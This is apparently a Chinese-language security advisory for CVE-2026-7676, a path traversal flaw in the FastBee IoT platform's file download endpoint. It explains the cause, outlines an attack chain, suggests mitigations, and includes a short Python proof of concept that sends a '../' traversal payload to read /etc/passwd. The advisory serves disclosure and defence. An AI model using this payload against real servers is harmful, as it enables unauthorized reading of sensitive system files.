IPBUF安全漏洞报告
English
CVE-2026-7676 CVSS 4.3 中危

CVE-2026-7676 FastBee路径遍历漏洞

披露日期: 2026-05-03
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7676
漏洞类型
路径遍历
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
kerwincui FastBee

相关标签

路径遍历FastBee文件读取IoT平台CVE-2026-7676

漏洞概述

kerwincui FastBee开源物联网平台在1.2.1及之前版本中存在路径遍历漏洞。该漏洞位于ToolController组件的文件下载接口,由于未正确过滤fileName参数,攻击者可通过构造恶意路径远程读取服务器敏感文件,目前厂商尚未响应。

技术细节

该漏洞源于FastBee项目中的`ToolController.java`文件,具体受影响的方法是`ToolController.download`。该方法接收用户传入的`fileName`参数,并将其直接用于文件路径拼接以提供下载功能。程序未对输入参数进行充分的校验或规范化处理(例如检查`../`字符或使用`normalize()`路径处理)。攻击者利用低权限账号(PR:L)向服务器发送特制请求,通过目录遍历序列绕过预期的下载目录限制,进而访问系统任意文件。由于无需用户交互(UI:N)且攻击复杂度低(AC:L),该漏洞易于被利用。

攻击链分析

STEP 1
侦察与访问
攻击者发现运行FastBee系统的目标,并获取低权限用户账号(PR:L)。
STEP 2
构造攻击载荷
攻击者分析文件下载接口,构造包含“../”序列的fileName参数,旨在穿越目录根路径。
STEP 3
发送恶意请求
攻击者向ToolController.download接口发送HTTP GET请求,携带恶意fileName参数。
STEP 4
获取敏感数据
服务器解析路径并返回目标文件内容(如/etc/passwd),攻击者成功读取系统敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example) target = "http://localhost:8080/tool/download" # Payload using path traversal to read /etc/passwd # Note: The exact endpoint path may vary based on routing configuration params = { "fileName": "../../../../../etc/passwd" } try: response = requests.get(target, params=params, timeout=10) if response.status_code == 200: print("[+] PoC executed successfully. Response:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"Error: {e}")

影响范围

kerwincui FastBee <= 1.2.1

防御指南

临时缓解措施
由于厂商尚未发布补丁,建议立即手动修改`ToolController.java`源码,在文件读取前增加路径合法性校验逻辑,确保无法访问Web根目录之外的文件。若非必要,建议暂时禁用该下载接口。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表